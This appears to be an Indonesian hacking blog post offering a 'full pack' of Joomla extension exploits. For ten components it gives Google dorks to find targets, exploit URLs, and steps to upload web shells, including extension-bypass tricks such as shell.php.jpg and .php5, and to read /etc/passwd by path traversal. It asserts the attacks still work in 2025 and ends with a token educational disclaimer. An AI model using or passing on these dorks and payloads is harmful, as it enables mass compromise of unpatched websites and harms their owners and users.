[+] Exploit Joomla! Full Pack
1. Com_Fabrik Exploit
Dork: inurl:index.php?option=com_fabrik
inurl:index.php?option=com_fabrik
Exploit: index.php?option=com_fabrik&view=form&fabrik=form
Exploit: index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
Step: Cari form upload/csrf → upload sc.
2. Com_Media Exploit
Dork: inurl:com_media site:com
Exploit: index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
Step: Upload file .txt/.jpg → site.com/images/filelu.txt.
3. Com_JCE Exploit
Dork: inurl:index.php?option=com_jce
Exploit: /plugins/editors/jce/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form
Step: Masuk File Manager → Upload shell → Rename → akses langsung via path publik.
[Exploit Joomla JCE Extension | Remote File Upload Vulnerability]
JCE Exploiter dan JCE Exploiter PHP
step:Buka JCE Exploiternya Selanjutnya masukan Targetnya, dan klik Start fullnya exploit joomla jce extension remote file upload
4. ElFinder Exploit
Dork: inurl:elfinder.html
Exploit: /elfinder/elfinder.html
Step: Buka UI elFinder → Upload file → buka link langsung → TARA!
5. Com_JoomGallery Exploit
Dork: inurl:index.php?option=com_joomgallery
Exploit: index.php?option=com_joomgallery&func=detail&id=1
Step: Upload gambar → sisipkan kode PHP → rename jadi shell.php.jpg → akses langsung via galeri.
6. Com_HDFlvPlayer Exploit
Dork: inurl:com_hdflvplayer
Exploit: /components/com_hdflvplayer/contus.php?upload=true
Step: Akses endpoint → upload file → buka URL upload hasilnya.
7. Com_JDownloads Exploit
Dork: inurl:index.php?option=com_jdownloads
Exploit: /index.php?option=com_jdownloads&Itemid=0&view=upload
Step: Upload file → cek path /downloads/ → akses file via URL.
8. Com_Myblog Exploit
Dork: inurl:option=com_myblog
Exploit: index.php?option=com_myblog&task=profile.edit
Step: Upload avatar dengan ekstensi .php5 → jika sukses → akses shell langsung.
9. Com_Foxcontact (LFI)
Dork: inurl:index.php?option=com_foxcontact
Exploit: index.php?option=com_foxcontact&view=loader&type=u&owner=file.txt
Step: Inject path ../../../../etc/passwd → verifikasi isi file server.
10. Com_Chronocontact Exploit
Dork: inurl:index.php?option=com_chronocontact
Exploit: index.php?option=com_chronocontact&chronoform=[nama_form]
Step: Cari form input → coba upload file → test bypass ekstensi → akses shell.
⚠️ Disclaimer & Catatan
Sampai tahun 2025, eksploitasi ini masih bisa berhasil jika:
- Target belum diupdate atau patching
- Masih pakai versi lama Joomla! atau plugin terkait
- Folder/file permission longgar
This article is intended solely for educational purposes only. The creator shall not be held liable for any misuse, illegal activities, or damages resulting from the unauthorized use of this.
"Where creativity, exploitation, and expression collide." — 6ickZone
Posting Komentar